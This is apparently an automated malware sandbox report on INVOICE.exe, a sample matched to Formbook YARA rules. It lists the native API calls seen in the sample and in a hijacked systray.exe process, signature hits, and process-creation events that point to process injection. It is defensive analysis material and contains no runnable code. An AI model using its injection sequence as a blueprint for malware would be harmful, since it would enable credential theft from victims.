Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AEB040 NtSuspendThread,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9A10 NtQuerySection,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AEA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AEAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9560 NtWriteFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE96D0 NtCreateKey,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AEA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9760 NtOpenProcess,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AEA770 NtOpenThread,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041A050 NtClose,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041A100 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00419F20 NtCreateFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00419FD0 NtReadFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041A0FA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00419F1A NtCreateFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00419FCC NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_048099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0480A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04809B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CA050 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CA100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CA0FA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9F1A NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C9FCC NtReadFile,
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00404853
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00406131
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_73701A98
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041E034
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D166
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00401177
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041DA6E
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041DB50
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041E3F5
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D403
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041DD62
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041D565
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00409E2C
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00409E30
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AD20A0
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B720A8
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ABB090
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B728EC
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B7E824
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ACA830
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B61002
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AC99BF
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AC4120
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AAF900
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B722AE
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B64AEF
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ACB236
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B5FA2B
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ADEBB0
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AD138B
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B523E3
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B6DBD2
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B603DA
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ADABD8
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B72B28
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ACA309
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ACAB40
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B4CB4F
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B64496
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AB841F
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B6D466
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ACB477
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AD2581
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B62D82
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00ABD5E0
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B725DD
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AA0D20
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B72D07
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B71D55
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B72EF7
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AC6E30
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B6D616
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B71FF1
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00B7DFCE
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041E034
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D166
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00401177
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041DA6E
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041DB50
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041E3F5
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D403
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041DD62
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_0041D565
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00402D90
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00409E2C
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00409E30
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047EB477
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04884496
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047D841F
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0488D466
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04882D82
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_048925DD
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047C0D20
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04892D07
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047DD5E0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04891D55
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047F2581
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047E6E30
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04892EF7
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0488D616
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0489DFCE
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04891FF1
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_048920A8
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047EA830
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_048928EC
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04881002
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0489E824
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047F20A0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047DB090
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047E4120
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047CF900
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047E99BF
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_048922AE
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04884AEF
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0487FA2B
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047EAB40
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_048803DA
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0488DBD2
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_048723E3
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047EA309
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_04892B28
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047FABD8
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_0486CB4F
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047FEBB0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_047F138B
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CD166
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CE3F5
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005CD403
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005B2D90
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005B9E30
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005B9E2C
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 8_2_005B2FB0
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: String function: 00AAB150 appears 136 times
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: String function: 0041BDA0 appears 38 times
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 047CB150 appears 136 times
          Source: INVOICE.exe, 00000000.00000003.200123102.0000000009B06000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE.exe
          Source: INVOICE.exe, 00000001.00000002.275741990.00000000007D3000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamesystray.exej% vs INVOICE.exe
          Source: INVOICE.exe, 00000001.00000002.276092694.0000000000D2F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE.exe
          Source: INVOICE.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/4@4/2
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
          Source: C:\Users\user\Desktop\INVOICE.exe | File created: C:\Users\user\AppData\Local\Temp\nsj921F.tmp
          Source: INVOICE.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INVOICE.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\INVOICE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: INVOICE.exe | ReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\INVOICE.exe | File read: C:\Users\user\Desktop\INVOICE.exe
          Source: unknown | Process created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exe | Process created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
